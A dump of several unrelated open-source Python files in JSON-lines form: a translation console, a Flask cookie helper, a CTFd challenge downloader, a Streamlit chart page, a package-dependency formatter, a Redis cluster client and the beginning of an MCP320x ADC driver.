in TranslationConsoleConfiguration.support_language.values():\n print(TranslationConsoleConfiguration.Error.unsupported_language.message())\n else:\n self.translationModel.setTarget(lang_code)\n\n def __c_set_source(self, lang_code, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.setSource_help)\n return\n if lang_code is None:\n print(TranslationConsoleConfiguration.Error.the_number_of_argument_does_not_match.message())\n elif lang_code not in TranslationConsoleConfiguration.support_language.values():\n print(TranslationConsoleConfiguration.Error.unsupported_language.message())\n print(TranslationConsoleConfiguration.support_language_description)\n else:\n self.translationModel.setSource(lang_code)\n\n def __c_status(self, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.status_help)\n return\n print(self.__status())\n\n def __c_invalid_command(self):\n print(TranslationConsoleConfiguration.Error.invalid_command.message())\n print(TranslationConsoleConfiguration.help)\n\n def __c_quick_translate(self, path, path2, hp=False):\n if hp:\n print(TranslationConsoleConfiguration.quick_translate_help)\n return\n self.__c_select(path)\n if path is None: return\n self.__c_translate()\n self.__c_save(path2)\n\n\n \"\"\"\n ================================================================\n \n Facade Pattern\n 사용자에게 간단한 인터페이스 제공\n \n ================================================================\n \"\"\"\n def console(self):\n print(TranslationConsoleConfiguration.description + '\\n')\n while True:\n selectFile = self.fileManager.select\n input_desc = \" ► command: \" if selectFile is None else f\" ► ({selectFile.name}) command: \"\n command = list(map(lambda x: x.lower(), re.sub(r' +', ' ', input(input_desc).strip()).split()))\n for i in range(3 - len(command)):\n command.append(None)\n hp = command[1] in ['-h', '-help']\n if command[0] in ['select', 's']:\n self.__c_select(command[1], hp=hp)\n elif command[0] in ['translate', 't']:\n self.__c_translate(hp=hp)\n elif command[0] in ['save', 'sv']:\n self.__c_save(command[1], hp=hp)\n elif command[0] in ['quicktranslate', 'qt']:\n self.__c_quick_translate(command[1], command[2], hp=hp)\n elif command[0] in ['show', 'sh']:\n self.__c_show(command[1], hp=hp)\n elif command[0] in ['settarget', 'st']:\n self.__c_set_target(command[1], hp=hp)\n elif command[0] in ['setsource', 'sc']:\n self.__c_set_source(command[1], hp=hp)\n elif command[0] in ['status', 'stat']:\n self.__c_status(hp=hp)\n elif command[0] in ['help', 'h']:\n self.__c_help()\n elif command[0] in ['close', 'c']:\n break\n else:\n self.__c_invalid_command()\n\n @staticmethod\n def printProgressBar(idx, total, length=100):\n percent = \"{0:.1f}\".format(100 * (idx / float(total)))\n filledLength = int(length * idx // total)\n bar = '█' * filledLength + '-' * (length - filledLength)\n print(f'\\rtranslate |{bar}| {percent}% complete', end=\"\\r\")\n if idx == total:\n print('\\n')\n\n\nTranslateConsole().console()\n","repo_name":"subJeonhui/DocumentTranslation","sub_path":"TranslationConsole.py","file_name":"TranslationConsole.py","file_ext":"py","file_size_in_byte":8074,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72800490056","text":"from flask import make_response\nimport os\n\n\nclass CookieManager:\n @staticmethod\n def extract_cookie_from_response(response):\n cookies = response.headers.getlist('Set-Cookie')\n cookie_mapper = {}\n for cookie in cookies:\n splitted = cookie.split(';', 1)\n cookie_key, value = splitted[0].split('=')\n other_options = splitted[1]\n cookie_mapper[cookie_key] = value, other_options\n\n return cookie_mapper\n\n @staticmethod\n def add_cookie_to_response(response_data,\n status_code=200,\n **cookie_kwargs):\n resp = make_response(response_data)\n resp.status_code = status_code\n secured = os.getenv('FLASK_ENV') == 'production'\n for key, value in cookie_kwargs.items():\n resp.set_cookie(key,\n value,\n path='/',\n httponly=True,\n secure=secured)\n\n return resp\n\n def decode_cookie(self, cookie):\n pass\n","repo_name":"chidioguejiofor/flask_boilerplate","sub_path":"api/utils/cookie_manager.py","file_name":"cookie_manager.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"17061113561","text":"from helpers import APISession, urljoin\nfrom pathlib import Path\nimport requests\nimport string\nimport re\nimport sys\nimport json\nimport argparse\n\n\ndef download(url: str, filepath: Path, chunk_size:int=8192):\n JUMP_LEFT_SEQ = '\\u001b[100D'\n filesize_dl = 0\n try:\n resp = requests.get(url, stream=True)\n filesize = int(resp.headers['Content-Length'])\n print(f\"{filepath.name} - {filesize} bytes\")\n with open(filepath, \"wb\") as handle:\n for chunk in resp.iter_content(chunk_size=chunk_size):\n if chunk: # filter out keep-alive new chunks\n handle.write(chunk)\n filesize_dl = filesize_dl + chunk_size\n print(JUMP_LEFT_SEQ, end='')\n print(f'\\r{filepath.name}: {filesize_dl*100/filesize:.2f}%', end='',flush=True)\n print()\n except Exception as e:\n print(e, file=sys.stderr)\n return\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n ap = argparse.ArgumentParser()\n ap.add_argument('--url', '-u', type=str, help='CTFd URL', required=True)\n ap.add_argument('--token', '-t', type=str, help=\"Your CTFd personal auth token\", required=True)\n ap.add_argument('--output', '-o', type=str, help=\"Destination folder\", default='dump')\n args = ap.parse_args()\n out_path = Path(args.output)\n ctfd = args.url\n s = APISession(prefix_url=ctfd)\n s.headers.update({\"Content-Type\": \"application/json\",\"Authorization\": f\"Token {args.token}\"})\n\n j_challenges = s.get('/api/v1/challenges').json()\n if j_challenges['success'] == True:\n for ch in j_challenges['data']:\n ch['name'] = re.sub(f'[{string.punctuation}]', '_', ch['name'])\n ch['category'] = re.sub(f'[{string.punctuation}]', '_', ch['category'])\n ch_path = (out_path / ch['category'].strip() / ch['name'].strip())\n\n ch_path.mkdir(parents=True, exist_ok=True)\n print(str(ch_path))\n ch = s.get(f'/api/v1/challenges/{ch[\"id\"]}').json()\n\n if ch['success'] == True:\n ch = ch['data']\n with open(str((ch_path / 'Description.md').absolute()),'w', encoding='utf-8') as f:\n f.write(f\"{ch['description']} \\n\")\n if len(ch['hints']):\n f.write(\"\\n**Hints** \\n\")\n for hint in ch['hints']:\n if 'content' in hint:\n f.write(f\"```\\n{hint['content']}\\n``` \\n\")\n if len(ch['files']):\n f.write(\"\\n**Files** \\n\")\n with open(str((ch_path / 'files.txt').absolute()),'w', encoding='utf-8') as filelist:\n for file in ch['files']:\n filename = file.split('/')[-1].split('?')[0]\n url = urljoin(s.prefix_url, file)\n download(url, ch_path / filename)\n f.write(f\"[{filename}]({url}) \\n\")\n filelist.write(f\"{url}\\n\")\n\n json.dump(ch, open(str((ch_path / 'rawdata.json').absolute()), 'w'))\n\n\n","repo_name":"leitosama/ctfd_collector","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"30419476020","text":"\"\"\"\nScript to create a figure from uploaded dataset\n\"\"\"\n\n# imports\nimport streamlit as st\nimport Ref\nimport pandas as pd\nimport altair as alt\nimport numpy as np\nimport plotly.figure_factory as ff\n\nRef.page_config()\n\n\nst.title(\"Data Explorer\")\n\nuser_file = st.file_uploader(\"Upload CSV\")\nst.divider()\n\nif user_file:\n print(\"success\")\nelse:\n x = np.array(range(0, 10))\n y1 = x*2\n y2 = x*3\n\n df = pd.DataFrame({'x': x, 'y1': y1, 'y2':y2})\n c = alt.Chart(df).mark_circle().encode(\n x='x', y='y1')\n st.altair_chart(c, use_container_width=True)\n","repo_name":"greyliedtke/WikiPy","sub_path":"pages/DataExplore.py","file_name":"DataExplore.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"4637405195","text":"#!/usr/bin/env python3\n# SPDX-License-Identifier: GPL-3.0-only\n\n\ndef format_deplist(pkgs: str, deptype: str) -> str:\n \"\"\" take a white-space delimited string of pkgs and a deptype\n\n it wraps them with a width of 80 by default, but takes care\n to not break $(vopt_if) blocks in half.\n\n actions done for the symbols given:\n 1. create 'pkgstr' that is pkgs with deptype and formatting for XBPS\n dependency template\n 2. replace 'zzopt' with '$(vopt_if'\n 3. replace '>' with ')'\n 4. replace '|' with ' '\n 5. wrap the text to 80 chars, no long_words or hyphen_breaks\n also add ' ' as a subsequent_indent\n 6. use wrap.fill to return a single multi-line string\n 7. replace '/' with ' '\n 8. return the string\n \"\"\"\n\n from textwrap import TextWrapper\n\n pkgstr: str = deptype + '=\"' + pkgs.replace('zzopt', '$(vopt_if') + '\"'\n\n \"\"\" Before formatting the string we replace > with ) to match the\n $(vopt_if and we also replace | with whitespace so that text\n formatting can separate it into a an whitespace, which is allowed\n since we put the dependencies inside a ' ' block \"\"\"\n pkgstr = pkgstr.replace('>', ')')\n pkgstr = pkgstr.replace('|', ' ')\n\n text_wrapper = TextWrapper(width=80,\n break_long_words=False,\n break_on_hyphens=False,\n subsequent_indent=' ',)\n\n pkgstr = text_wrapper.fill(pkgstr)\n\n \"\"\" / must be replaced with a space after the string is Formatted because\n it can't be separated into a newspace, only the dependencies inside the\n same group marked by the | char \"\"\"\n pkgstr = pkgstr.replace('/', ' ')\n\n return pkgstr\n\n\ndef main():\n from argparse import ArgumentParser\n from subprocess import run, PIPE\n from os.path import isfile\n from re import sub, MULTILINE\n\n canbedeps = [\"hostmakedepends\", \"makedepends\", \"depends\", \"checkdepends\"]\n\n p = ArgumentParser(description=\"trim dependencies of templates.\")\n p.add_argument('pkgname', metavar='template', type=str,\n help='name of the package to be trimmed')\n p.add_argument('--deps', dest='deptypes', nargs='+',\n help='single white-space separated string of deptypes')\n p.add_argument('pkgs', type=str,\n help='single white-space separated string of packages')\n p.add_argument('-i', dest='replace', action='store_true', default=False,\n help='replace dependencies in template')\n\n args = p.parse_args()\n\n \"\"\"\n Create a path by taking the output of xdistdir and adding srcpkgs/\n the pkgname and /template to the end\n \"\"\"\n filepath = 'srcpkgs/' + args.pkgname + '/template'\n xdistdir = run('xdistdir', stdout=PIPE)\n filepath = xdistdir.stdout.decode('utf-8').replace('\\n', '/') + filepath\n\n if not isfile(filepath):\n print('invalid path: ' + filepath)\n exit(2)\n\n \"\"\" packages recieved might be broken into multiple lines, we do our own\n text formatting on format_deplist\n \"\"\"\n pkgs: str = args.pkgs.replace('\\n', ' ')\n\n \"\"\" we might have multiple deptypes separated by white-space\n we will iterate over each one of them separately as they\n are independented of one another\n \"\"\"\n for deptype in args.deptypes:\n if deptype not in canbedeps:\n continue\n\n pkgs = format_deplist(pkgs, deptype)\n\n print(pkgs)\n\n if args.replace:\n with open(filepath, 'r') as file_in:\n mod = file_in.read()\n\n regex = deptype + '=\\\"(.*\\\\n){0,}?.*\\\"'\n mod = sub(r'^%s' % regex, pkgs, str(mod),\n flags=MULTILINE)\n\n with open(filepath, 'w') as file_out:\n file_out.write(mod)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"shizonic/xtools-devel","sub_path":"replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":3905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"38656447154","text":"# -*- coding: UTF-8 -*-\nimport binascii\n\nimport redis\nfrom redis._compat import (\n b, iteritems, iterkeys, itervalues, basestring, bytes)\nfrom redis.client import list_or_args\n\n\nclass StrictRedisCluster:\n \"\"\"\n Implementation of the Redis Cluster Client using redis.StrictRedis\n\n This abstract class provides a Python interface to all Redis commands on the cluster of redis servers.\n and implementing how the commands are sent to and received from the cluster.\n\n \"\"\"\n\n _read_keys = {\n 'debug': 'debug', 'getbit': 'getbit',\n 'get': 'get', 'getrange': 'getrange', 'hget': 'hget',\n 'hgetall': 'hgetall', 'hkeys': 'hkeys', 'hlen': 'hlen', 'hmget': 'hmget',\n 'hvals': 'hvals', 'lindex': 'lindex', 'llen': 'llen',\n 'lrange': 'lrange', 'object': 'object',\n 'scard': 'scard', 'sismember': 'sismember', 'smembers': 'smembers',\n 'srandmember': 'srandmember', 'strlen': 'strlen', 'type': 'type',\n 'zcard': 'zcard', 'zcount': 'zcount', 'zrange': 'zrange', 'zrangebyscore': 'zrangebyscore',\n 'zrank': 'zrank', 'zrevrange': 'zrevrange', 'zrevrangebyscore': 'zrevrangebyscore',\n 'zrevrank': 'zrevrank', 'zscore': 'zscore',\n 'mget': 'mget', 'bitcount': 'bitcount', 'echo': 'echo', 'debug_object': 'debug_object',\n 'substr': 'substr', 'keys': 'keys', 'randomkey': 'randomkey',\n }\n\n _write_keys = {\n 'append': 'append', 'blpop': 'blpop', 'brpop': 'brpop', 'brpoplpush': 'brpoplpush',\n 'decr': 'decr', 'decrby': 'decrby', 'del': 'del', 'exists': 'exists', 'hexists': 'hexists',\n 'expire': 'expire', 'expireat': 'expireat', 'pexpire': 'pexpire', 'pexpireat': 'pexpireat', 'getset': 'getset', 'hdel': 'hdel',\n 'hincrby': 'hincrby', 'hincrbyfloat': 'hincrbyfloat', 'hset': 'hset', 'hsetnx': 'hsetnx', 'hmset': 'hmset',\n 'incr': 'incr', 'incrby': 'incrby', 'incrbyfloat': 'incrbyfloat', 'linsert': 'linsert', 'lpop': 'lpop',\n 'lpush': 'lpush', 'lpushx': 'lpushx', 'lrem': 'lrem', 'lset': 'lset',\n 'ltrim': 'ltrim', 'move': 'move', 'bitop': 'bitop',\n 'persist': 'persist', 'publish': 'publish', 'psubscribe': 'psubscribe', 'punsubscribe': 'punsubscribe',\n 'rpop': 'rpop', 'rpoplpush': 'rpoplpush', 'rpush': 'rpush',\n 'rpushx': 'rpushx', 'sadd': 'sadd', 'sdiff': 'sdiff', 'sdiffstore': 'sdiffstore',\n 'set': 'set', 'setbit': 'setbit', 'setex': 'setex', 'setnx': 'setnx',\n 'setrange': 'setrange', 'sinter': 'sinter', 'sinterstore': 'sinterstore', 'smove': 'smove',\n 'sort': 'sort', 'spop': 'spop', 'srem': 'srem', 'subscribe': 'subscribe',\n 'sunion': 'sunion', 'sunionstore': 'sunionstore', 'unsubscribe': 'unsubscribe', 'unwatch': 'unwatch',\n 'watch': 'watch', 'zadd': 'zadd', 'zincrby': 'zincrby', 'zinterstore': 'zinterstore',\n 'zrem': 'zrem', 'zremrangebyrank': 'zremrangebyrank', 'zremrangebyscore': 'zremrangebyscore', 'zunionstore': 'zunionstore',\n 'mset': 'mset', 'msetnx': 'msetnx', 'rename': 'rename', 'renamenx': 'renamenx',\n 'del': 'del', 'delete': 'delete', 'ttl': 'ttl', 'pttl': 'pttl', 'flushall': 'flushall', 'flushdb': 'flushdb',\n }\n\n _dont_hash = {\n 'auth': 'auth', 'monitor': 'monitor', 'quit': 'quit',\n 'shutdown': 'shutdown', 'slaveof': 'slaveof', 'slowlog': 'slowlog', 'sync': 'sync',\n 'discard': 'discard', 'exec': 'exec', 'multi': 'multi',\n }\n\n _tag_keys = {\n 'mget': 'mget', 'rename': 'rename', 'renamenx': 'renamenx',\n 'mset': 'mset', 'msetnx': 'msetnx',\n 'brpoplpush': 'brpoplpush', 'rpoplpush': 'rpoplpush',\n 'sdiff': 'sdiff', 'sdiffstore': 'sdiffstore',\n 'sinter': 'sinter', 'sinterstore': 'sinterstore',\n 'sunion': 'sunion', 'sunionstore': 'sunionstore',\n 'smove': 'smove', 'zinterstore': 'zinterstore',\n 'zunionstore': 'zunionstore', 'sort': 'sort'\n }\n\n _loop_keys = {\n 'keys': 'keys', 'dbsize': 'dbsize',\n\n 'save': 'save', 'bgsave': 'bgsave',\n 'bgrewriteaof': 'bgrewriteaof',\n 'dbsize': 'dbsize', 'info': 'info',\n 'lastsave': 'lastsave', 'ping': 'ping',\n 'flushall': 'flushall', 'flushdb': 'flushdb',\n 'sync': 'sync',\n 'config_set': 'config_set', 'config_get': 'config_get',\n 'time': 'time', 'client_list': 'client_list'\n }\n\n _loop_keys_admin = {\n 'save': 'save', 'bgsave': 'bgsave',\n 'bgrewriteaof': 'bgrewriteaof',\n 'info': 'info',\n 'lastsave': 'lastsave', 'ping': 'ping',\n 'flushall': 'flushall', 'flushdb': 'flushdb',\n 'sync': 'sync',\n 'config_set': 'config_set', 'config_get': 'config_get',\n 'time': 'time', 'client_list': 'client_list'\n }\n\n def __init__(self, cluster={}, db=0, mastersonly=False):\n # raise exception when wrong server hash\n if 'nodes' not in cluster:\n raise Exception(\n \"rediscluster: Please set a correct array of redis cluster.\")\n\n self.cluster = cluster\n have_master_of = 'master_of' in self.cluster\n self.no_servers = len(self.cluster['master_of']) if have_master_of else len(self.cluster['nodes'])\n\n self.redises = {}\n redises_cons = {}\n self.cluster['slaves'] = {}\n\n # connect to all servers\n for alias, server in iteritems(self.cluster['nodes']):\n\n if have_master_of and alias not in self.cluster['master_of']:\n continue\n\n server_str = str(server)\n if server_str in redises_cons:\n self.redises[alias] = redises_cons[server_str]['master']\n self.redises[alias +\n '_slave'] = redises_cons[server_str]['slave']\n self.cluster['slaves'][alias +\n '_slave'] = redises_cons[server_str]['slave_node']\n else:\n try:\n # connect to master\n self.__redis = redis.StrictRedis(db=db, **server)\n if not mastersonly and not have_master_of:\n info = self.__redis.info()\n if info['role'] != 'master':\n raise redis.DataError(\n \"rediscluster: server %s is not a master.\" % (server,))\n\n self.redises[alias] = self.__redis\n redises_cons[server_str] = {}\n redises_cons[server_str]['master'] = self.redises[alias]\n\n # connect to slave\n slave_connected = False\n slave = {}\n if not mastersonly:\n if have_master_of:\n slave = self.cluster[\n 'nodes'][self.cluster['master_of'][alias]]\n elif 'connected_slaves' in info and info['connected_slaves'] > 0:\n slave_host, slave_port, slave_online = info[\n 'slave0'].split(',')\n if slave_online == 'online':\n slave = {'host': slave_host, 'port': slave_port}\n\n if slave :\n try:\n redis_slave = redis.StrictRedis(host=slave['host'], port=int(slave['port']), db=db)\n self.redises[alias + '_slave'] = redis_slave\n self.cluster['slaves'][alias + '_slave'] = {\n 'host': slave['host'], 'port': slave['port']}\n redises_cons[server_str][\n 'slave'] = self.redises[alias + '_slave']\n redises_cons[server_str]['slave_node'] = self.cluster['slaves'][alias + '_slave']\n slave_connected = True\n except redis.RedisError as e:\n pass\n # \"RedisCluster cannot connect to: \" + slave_host +':'+ slave_port\n\n if not slave_connected:\n self.redises[alias + '_slave'] = self.redises[alias]\n self.cluster['slaves'][alias + '_slave'] = server\n redises_cons[server_str][\n 'slave'] = self.redises[alias + '_slave']\n redises_cons[server_str]['slave_node'] = self.cluster[\n 'slaves'][alias + '_slave']\n\n except redis.RedisError as e:\n raise redis.ConnectionError(\n \"rediscluster cannot connect to: %s %s\" % (server, e))\n\n def __getattr__(self, name, *args, **kwargs):\n \"\"\"\n Magic method to handle all redis commands\n - string name The name of the command called.\n - tuple args of supplied arguments to the command.\n \"\"\"\n def function(*args, **kwargs):\n if name not in StrictRedisCluster._loop_keys:\n # take care of hash tags\n tag_start = None\n key_type = hash_tag = ''\n # since we don't have \"first item\" in dict,\n # this list is needed in order to check hash_tag in mset({\"a{a}\": \"a\", \"b\":\"b\"})\n list_ht = []\n if isinstance(args[0], (basestring, bytes)):\n key_type = 'string'\n list_ht.append(args[0])\n else:\n if isinstance(args[0], list):\n key_type = 'list'\n list_ht.append(args[0][0])\n else:\n key_type = 'dict'\n list_ht = iterkeys(args[0])\n\n # check for hash tags\n for k in list_ht:\n try:\n tag_start = k.index('{')\n hash_tag = k\n break\n except Exception as e:\n tag_start = None\n\n # trigger error msg on tag keys unless we have hash tags e.g. \"bar{zap}\"\n if name in StrictRedisCluster._tag_keys and not tag_start:\n try:\n return getattr(self, '_rc_' + name)(*args, **kwargs)\n except AttributeError:\n raise redis.DataError(\"rediscluster: Command %s Not Supported (each key name has its own node)\" % name)\n\n # get the hash key\n hkey = args[0]\n # take care of hash tags names for forcing multiple keys on the same node,\n # e.g. r.set(\"bar{zap}\", \"bar\"), r.mget([\"foo{foo}\",\"bar\"])\n if tag_start is not None:\n L = list(args)\n if key_type != 'string':\n if key_type == 'list':\n hkey = L[0][0][tag_start + 1:-1]\n L[0][0] = L[0][0][0:tag_start]\n else:\n hkey = hash_tag[tag_start + 1:-1]\n L[0][hash_tag[0:tag_start]] = L[0][hash_tag]\n del L[0][hash_tag]\n else:\n hkey = L[0][tag_start + 1:-1]\n L[0] = L[0][0:tag_start]\n\n args = tuple(L)\n\n # get the node number\n node = self._getnodenamefor(hkey)\n if name in StrictRedisCluster._write_keys:\n redisent = self.redises[node]\n elif name in StrictRedisCluster._read_keys:\n redisent = self.redises[node + '_slave']\n else:\n raise redis.DataError(\"rediscluster: Command %s Not Supported (each key name has its own node)\" % name)\n\n # Execute the command on the server\n return getattr(redisent, name)(*args, **kwargs)\n\n else:\n\n # take care of keys that don't need to go through master and slaves redis servers\n if name not in self._loop_keys_admin:\n try:\n return getattr(self, '_rc_' + name)(*args, **kwargs)\n except AttributeError:\n raise redis.DataError(\"rediscluster: Command %s Not Supported (each key name has its own node)\" % name)\n\n result = {}\n for alias, redisent in iteritems(self.redises):\n if (name in StrictRedisCluster._write_keys and alias.find('_slave') >= 0) or (name in StrictRedisCluster._read_keys and alias.find('_slave') == -1):\n res = None\n else:\n res = getattr(redisent, name)(*args, **kwargs)\n\n result[alias] = res\n\n return result\n\n return function\n\n def _getnodenamefor(self, name):\n \"Return the node name where the ``name`` would land to\"\n return 'node_' + str(\n (abs(binascii.crc32(b(name)) & 0xffffffff) % self.no_servers) + 1)\n\n def getnodefor(self, name):\n \"Return the node where the ``name`` would land to\"\n node = self._getnodenamefor(name)\n return {node: self.cluster['nodes'][node]}\n\n def __setitem__(self, name, value):\n \"Set the value at key ``name`` to ``value``\"\n return self.set(name, value)\n\n def __getitem__(self, name):\n \"\"\"\n Return the value at key ``name``, raises a KeyError if the key\n doesn't exist.\n \"\"\"\n value = self.get(name)\n if value:\n return value\n raise KeyError(name)\n\n def __delitem__(self, *names):\n \"Delete one or more keys specified by ``names``\"\n return self.delete(*names)\n\n def object(self, infotype, key):\n \"Return the encoding, idletime, or refcount about the key\"\n redisent = self.redises[self._getnodenamefor(key) + '_slave']\n return getattr(redisent, 'object')(infotype, key)\n\n def _rc_brpoplpush(self, src, dst, timeout=0):\n \"\"\"\n Pop a value off the tail of ``src``, push it on the head of ``dst``\n and then return it.\n\n This command blocks until a value is in ``src`` or until ``timeout``\n seconds elapse, whichever is first. A ``timeout`` value of 0 blocks\n forever.\n Not atomic\n \"\"\"\n rpop = self.brpop(src, timeout)\n if rpop is not None:\n self.lpush(dst, rpop[1])\n return rpop[1]\n return None\n\n def _rc_rpoplpush(self, src, dst):\n \"\"\"\n RPOP a value off of the ``src`` list and LPUSH it\n on to the ``dst`` list. Returns the value.\n \"\"\"\n rpop = self.rpop(src)\n if rpop is not None:\n self.lpush(dst, rpop)\n return rpop\n return None\n\n def _rc_sdiff(self, src, *args):\n \"\"\"\n Returns the members of the set resulting from the difference between\n the first set and all the successive sets.\n \"\"\"\n args = list_or_args(src, args)\n src_set = self.smembers(args.pop(0))\n if src_set is not set([]):\n for key in args:\n src_set.difference_update(self.smembers(key))\n return src_set\n\n def _rc_sdiffstore(self, dst, src, *args):\n \"\"\"\n Store the difference of sets ``src``, ``args`` into a new\n set named ``dest``. Returns the number of keys in the new set.\n \"\"\"\n args = list_or_args(src, args)\n result = self.sdiff(*args)\n if result is not set([]):\n return self.sadd(dst, *list(result))\n return 0\n\n def _rc_sinter(self, src, *args):\n \"\"\"\n Returns the members of the set resulting from the difference between\n the first set and all the successive sets.\n \"\"\"\n args = list_or_args(src, args)\n src_set = self.smembers(args.pop(0))\n if src_set is not set([]):\n for key in args:\n src_set.intersection_update(self.smembers(key))\n return src_set\n\n def _rc_sinterstore(self, dst, src, *args):\n \"\"\"\n Store the difference of sets ``src``, ``args`` into a new\n set named ``dest``. Returns the number of keys in the new set.\n \"\"\"\n args = list_or_args(src, args)\n result = self.sinter(*args)\n if result is not set([]):\n return self.sadd(dst, *list(result))\n return 0\n\n def _rc_smove(self, src, dst, value):\n \"\"\"\n Move ``value`` from set ``src`` to set ``dst``\n not atomic\n \"\"\"\n if self.type(src) != b(\"set\"):\n return self.smove(src + \"{\" + src + \"}\", dst, value)\n if self.type(dst) != b(\"set\"):\n return self.smove(dst + \"{\" + dst + \"}\", src, value)\n if self.srem(src, value):\n return 1 if self.sadd(dst, value) else 0\n return 0\n\n def _rc_sunion(self, src, *args):\n \"\"\"\n Returns the members of the set resulting from the union between\n the first set and all the successive sets.\n \"\"\"\n args = list_or_args(src, args)\n src_set = self.smembers(args.pop(0))\n if src_set is not set([]):\n for key in args:\n src_set.update(self.smembers(key))\n return src_set\n\n def _rc_sunionstore(self, dst, src, *args):\n \"\"\"\n Store the union of sets ``src``, ``args`` into a new\n set named ``dest``. Returns the number of keys in the new set.\n \"\"\"\n args = list_or_args(src, args)\n result = self.sunion(*args)\n if result is not set([]):\n return self.sadd(dst, *list(result))\n return 0\n\n def _rc_mset(self, mapping):\n \"Sets each key in the ``mapping`` dict to its corresponding value\"\n result = True\n for k, v in iteritems(mapping):\n result = result and self.set(k, v)\n return result\n\n def _rc_msetnx(self, mapping):\n \"\"\"\n Sets each key in the ``mapping`` dict to its corresponding value if\n none of the keys are already set\n \"\"\"\n for k in iterkeys(mapping):\n if self.exists(k):\n return False\n\n return self._rc_mset(mapping)\n\n def _rc_mget(self, keys, *args):\n \"\"\"\n Returns a list of values ordered identically to ``*args``\n \"\"\"\n args = list_or_args(keys, args)\n result = []\n for key in args:\n result.append(self.get(key))\n return result\n\n def _rc_rename(self, src, dst):\n \"\"\"\n Rename key ``src`` to ``dst``\n \"\"\"\n if src == dst:\n return self.rename(src + \"{\" + src + \"}\", src)\n if not self.exists(src):\n return self.rename(src + \"{\" + src + \"}\", src)\n\n self.delete(dst)\n ktype = self.type(src)\n kttl = self.ttl(src)\n\n if ktype == b('none'):\n return False\n\n if ktype == b('string'):\n self.set(dst, self.get(src))\n elif ktype == b('hash'):\n self.hmset(dst, self.hgetall(src))\n elif ktype == b('list'):\n for k in self.lrange(src, 0, -1):\n self.rpush(dst, k)\n elif ktype == b('set'):\n for k in self.smembers(src):\n self.sadd(dst, k)\n elif ktype == b('zset'):\n for k, v in self.zrange(src, 0, -1, withscores=True):\n self.zadd(dst, v, k)\n\n # Handle keys with an expire time set\n kttl = -1 if kttl is None or kttl < 0 else int(kttl)\n if kttl != -1:\n self.expire(dst, kttl)\n\n return self.delete(src)\n\n def _rc_renamenx(self, src, dst):\n \"Rename key ``src`` to ``dst`` if ``dst`` doesn't already exist\"\n if self.exists(dst):\n return False\n\n return self._rc_rename(src, dst)\n\n def _rc_keys(self, pattern='*'):\n \"Returns a list of keys matching ``pattern``\"\n\n result = []\n for alias, redisent in iteritems(self.redises):\n if alias.find('_slave') == -1:\n continue\n\n result.extend(redisent.keys(pattern))\n\n return result\n\n def _rc_dbsize(self):\n \"Returns the number of keys in the current database\"\n\n result = 0\n for alias, redisent in iteritems(self.redises):\n if alias.find('_slave') == -1:\n continue\n\n result += redisent.dbsize()\n\n return result\n","repo_name":"salimane/rediscluster-py","sub_path":"rediscluster/cluster_client.py","file_name":"cluster_client.py","file_ext":"py","file_size_in_byte":20485,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"45"} +{"seq_id":"20540203685","text":"#!/usr/bin/env python\n#\n# MCP320x\n#\n# Author: Maurik Holtrop\n#\n# This module interfaces with the MCP300x or MCP320x family of chips. These\n# are 10-bit and 12-bit ADCs respectively. The x number indicates the number\n# of multiplexed analog inputs: 2 (MCP3202), 4 (MCP3204) or 8 (MCP3208)\n# Communications with this chip are over the SPI protocol.\n# See: https://en.wikipedia.org/wiki/Serial_Peripheral_Interface_Bus\n#\n# The version of the code has two SPI interfaces: the builtin hardware\n# SPI interface on the RPI, or a \"bit-banged\" GPIO version.\n#\n# Bit-Bang GPIO:\n# We emulate a SPI port in software using the GPIO lines.\n# This is a bit slower than the hardware interface, but it is far more\n# clear what is going on, plus the RPi has only one SPI device.\n# Connections: RPi GPIO to MCP320x\n# CS_bar_pin = CS/SHDN\n# CLK_pin = CLK\n# MOSI_pin = D_in\n# MISO_pin = D_out\n#\n# Hardware SPI:\n# This uses the builtin hardware on the RPi. You need to enable this with the\n# raspi-config program first. The data rate can be up to 1MHz.\n# Connections: RPi pins to MCP320x\n# CE0 or CE1 = CS/SHDN (chip select) set CS_bar = 0 or 1\n# SCK = CLK set CLK_pin = 1000000 (transfer speed)\n# MOSI = D_in set MOSI_pin = 0\n# MISO = D_out set MISO_pin = 0\n\n# The SPI protocol simulated here is MODE=0, CPHA=0, which has a positive polarity clock,\n# (the clock is 0 at rest, active at 1) and a positive phase (0 to 1 transition) for reading\n# or writing the data. Thus corresponds to the specifications of the MCP320x chips.\n#\n# From MCP3208 datasheet:\n# Outging data : MCU latches data to A/D converter on rising edges of SCLK\n# Incoming data: Data is clocked out of A/D converter on falling edges, so should be read on rising edge.\ntry:\n import RPi.GPIO as GPIO\nexcept ImportError as error:\n pass\ntry:\n import Adafruit_BBIO as GPIO\nexcept ImportError as error:\n pass\n\ntry:\n import spidev\nexcept ImportError as error:\n pass\n\nfrom DevLib.MyValues import MyValues\n\n\nclass MCP320x:\n \"\"\"This is an class that implements an interface to the MCP320x ADC chips.\n Standard is the MCP3208, but is will also work wiht the MCP3202, MCP3204, MCP3002, MCP3004 and MCP3008.\"\"\"\n\n def __init__(self, cs_bar_pin, clk_pin=1000000, mosi_pin=0, miso_pin=0, chip='MCP3208',\n channel_max=None, bit_length=None, single_ended=True):\n \"\"\"Initialize the code and set the GPIO pins.\n The last argument, ch_max, is 2 for the MCP3202, 4 for the\n MCP3204 or 8 for the MCS3208.\"\"\"\n\n self._CLK = clk_pin\n self._MOSI = mosi_pin\n self._MISO = miso_pin\n self._CS_bar = cs_bar_pin\n\n chip_dictionary = {\n \"MCP3202\": (2, 12),\n \"MCP3204\": (4, 12),\n \"MCP3208\": (8, 12),\n \"MCP3002\": (2, 10),\n 